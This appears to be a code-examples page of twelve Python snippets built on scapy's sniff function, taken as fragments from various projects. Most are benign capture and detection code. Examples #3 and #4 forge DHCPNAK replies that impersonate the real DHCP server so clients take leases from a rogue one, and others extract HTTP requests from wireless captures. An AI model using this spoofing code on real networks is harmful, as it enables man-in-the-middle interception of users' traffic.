def main():
    global local_ip
    global broadcast

    if os.geteuid() != 0:
        exit("Need root permission")
        sys.exit()

    # log file
    filename = "spoof.log"

    logging.basicConfig(filename=filename, filemode="a", level=logging.DEBUG)

    # interface
    interface = unicode("en0", "utf-8")
    addrs = netifaces.ifaddresses(interface)
    try:
        local_ip = addrs[netifaces.AF_INET][0]["addr"]
        broadcast = addrs[netifaces.AF_INET][0]["broadcast"]
    except KeyError:
        sys.exit("Cannot read address/broadcast address on interface {}".format(interface))
    logging.info("ARP Spoofing Detection Started on {}".format(local_ip))
    print("ARP Spoofing Detection Started.")
    scapy.sniff(filter="arp", prn=getAdrress, store=0)

    pass
Example #2
0
def load_pcap():
	packets = scapy.PacketList()
	for root, dirs, filenames in os.walk(config.KismetPath):
		for file in filenames:
			filename = os.path.join(root, file)
			if not filename.endswith('.dump'):
				continue
			new = scapy.sniff(offline=filename, lfilter = is_http)
			# print 'new', len(new)
			packets.extend(new)
			
	print 'Summary', packets.summary()
	for p in packets:
		print p.lastlayer().name, p.load
	scapy.wrpcap('Packets.dump', packets)
Example #3
0

# Spoofing a DHCPNAK from the legit DHCP server when a DHCPREQUEST is send from the DHCP client.
def nak_request(pkt):
    msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2)
    sendp(
        Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) /
        IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) /
        UDP(sport=67, dport=68) / BOOTP(op=2,
                                        ciaddr=pkt[IP].src,
                                        siaddr=pkt[IP].dst,
                                        chaddr=pkt[Ether].src,
                                        xid=pkt[BOOTP].xid) /
        DHCP(options=[('server_id', globals()['dhcp_server_ip']),
                      ('message-type', 'nak'), ('end')]))


sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] +
      " and (port 67 or 68)",
      prn=get_dhcp_server,
      store=0,
      count=1,
      timeout=1)

if globals().has_key('dhcp_server_ip') == False:
    print("No other DHCP server found, exiting")
    sys.exit(0)

sniff(filter="arp or (udp and (port 67 or 68))",
      prn=detect_dhcp_request,
      store=0)
Example #4
0
            nak_request(pkt)
        else:
            msg("Giving up on spoofing DHCPNAK's for " + pkt[Ether].src + ", failed " +
            str(globals()['limit']) + " times",2)
            del globals()['attempted_dhcpnaks'][pkt[Ether].src]
    if pkt[ARP] and pkt[ARP].op == 0x0002:
        if globals()['macs'].has_key(pkt[Ether].src) == True:
            if pkt[ARP].hwdst == globals()['illegal_dhcp_server_mac']:
                msg("Succes: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " +
                pkt[ARP].psrc + "from the illegal DHCP server",1) 
            elif pkt[ARP].hwdst == globals()['dhcp_server_mac']:
                msg("Failure: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " +
                pkt[ARP].psrc + " from the legit DHCP server",1) 
            del globals()['macs'][pkt[Ether].src]

# Spoofing a DHCPNAK from the legit DHCP server when a DHCPREQUEST is send from the DHCP client.
def nak_request(pkt):
    msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'],2)
    sendp(Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst)/
    IP(src=globals()['dhcp_server_ip'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)/
    BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)/
    DHCP(options=[('server_id',globals()['dhcp_server_ip']),('message-type','nak'), ('end')]))

sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] + " and (port 67 or 68)",
prn=get_dhcp_server, store=0, count=1, timeout=1)

if globals().has_key('dhcp_server_ip') == False:
    print("No other DHCP server found, exiting")
    sys.exit(0)

sniff(filter="arp or (udp and (port 67 or 68))", prn=detect_dhcp_request, store=0)
Example #5
0
def main():
        scapy.sniff(iface="eth0",count=1,filter="udp port 53",prn=procPacket)
Example #6
0
def read_pcap(filepath, packets):
    sniff(offline=filepath, prn=add_packet(packets))
Example #7
0
def run_capture(interface, duration, packets):
    sniff(iface=interface,
          timeout=float(duration),
          store=0,
          prn=add_packet(packets))
Example #8
0
def main():
    scapy.sniff(iface="eth0", count=1, filter="udp port 53", prn=procPacket)
Example #9
0
import os, scapy
import config

def is_http(p):
	if not p.haslayer('TCP') or p.dport != 80 or not p.haslayer('Raw'):
		return False
	return p.load.startswith('GET') or p.load.startswith('POST')

packets = scapy.PacketList()
for root, dirs, filenames in os.walk(config.KismetPath):
	for file in filenames:
		 filename = os.path.join(root, file)
		 if not filename.endswith('.dump'):
		 	continue
		 new = scapy.sniff(offline=filename, lfilter = is_http)
		 print 'new', len(new)
		 packets.extend(new)
		 
#print 'Summary', packets.summary()
for p in packets:
	print p.lastlayer().name, p.load
scapy.wrpcap('Packets.dump', packets)
Example #10
0
def sniff_packet(interface):
    scapy.sniff(iface=interface, store=False, prn=process_packets)
Example #11
0
def read_pcap(filepath, packets):
        sniff(offline=filepath,
              prn=add_packet(packets)
              )
Example #12
0
def run_capture(interface, duration, packets):
        sniff(iface=interface,
              timeout=float(duration),
              store=0,
              prn=add_packet(packets)
              )